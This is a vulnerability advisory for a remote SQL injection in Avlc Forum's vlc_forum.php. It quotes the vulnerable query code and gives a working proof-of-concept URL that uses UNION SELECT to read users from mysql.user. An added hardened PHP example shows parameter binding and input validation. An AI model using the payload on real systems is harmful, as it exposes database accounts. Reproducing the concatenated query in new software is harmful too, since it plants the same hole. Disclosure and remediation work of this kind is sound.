Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

2008.07.18
Credit: CWH
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

====================================================================
Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
====================================================================

.. CWH Underground Hacking Team ..

AUTHOR : CWH Underground
DATE   : 12 July 2008
SITE   : cwh.citec.us

#####################################################
APPLICATION : Avlc Forum
VERSION     : N/A
VENDOR      : N/A
DOWNLOAD    : http://www.easy-script.com/compt.php?id=2147
#####################################################

--- Remote SQL Injection ---

---------------------------------
Vulnerable File [vlc_forum.php]
---------------------------------

@Line

141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";
142: $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error());

-------------
POC Exploit
-------------

[+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--

#####################################################################
Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
#####################################################################

References:

http://www.securityfocus.com/bid/30202
http://www.milw0rm.com/exploits/6058
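
The query at line 141 places $id directly into the SQL string, and line 142 returns the statement and the driver error to the client. A hardened form of that lookup follows as an added example (not Avlc Forum or CWH code); the PDO/SQLite setup, the "body" column and the function names parse_message_id, fetch_thread and show_message are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not Avlc Forum code. Table vlc_forum and columns id/re come
// from the advisory; the "body" column, function names and the in-memory
// SQLite database (requires pdo_sqlite) are assumptions for the demo.

function parse_message_id($raw): ?int
{
    // Only a short run of decimal digits is a valid id; anything else is rejected.
    if (!is_string($raw) || strlen($raw) > 9 || !ctype_digit($raw)) {
        return null;
    }
    return (int) $raw;
}

function fetch_thread(PDO $pdo, int $id): array
{
    // Placeholders keep the value out of the SQL text; two names are used
    // because native prepared statements do not allow reusing one name.
    $stmt = $pdo->prepare('SELECT * FROM vlc_forum WHERE id = :id OR re = :re');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':re', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function show_message(PDO $pdo, $rawId): string
{
    $id = parse_message_id($rawId);
    if ($id === null) {
        return 'invalid id';
    }
    try {
        return count(fetch_thread($pdo, $id)) . ' row(s)';
    } catch (PDOException $e) {
        error_log('vlc_forum query failed: ' . $e->getMessage()); // server-side only
        return 'internal error'; // never echo the SQL or driver error to the client
    }
}

// Constructed sample data.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE vlc_forum (id INTEGER PRIMARY KEY, re INTEGER, body TEXT)');
$pdo->exec("INSERT INTO vlc_forum VALUES (1, 0, 'topic'), (2, 1, 'reply'), (3, 0, 'other')");

echo show_message($pdo, '1'), "\n";
echo show_message($pdo, '-999999/**/UNION/**/SELECT/**/1,user,3'), "\n";
```

Validation and parameter binding are independent layers: the bound statement stays safe even if the digit check is later relaxed, and the generic error string removes the query text that line 142 exposed.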

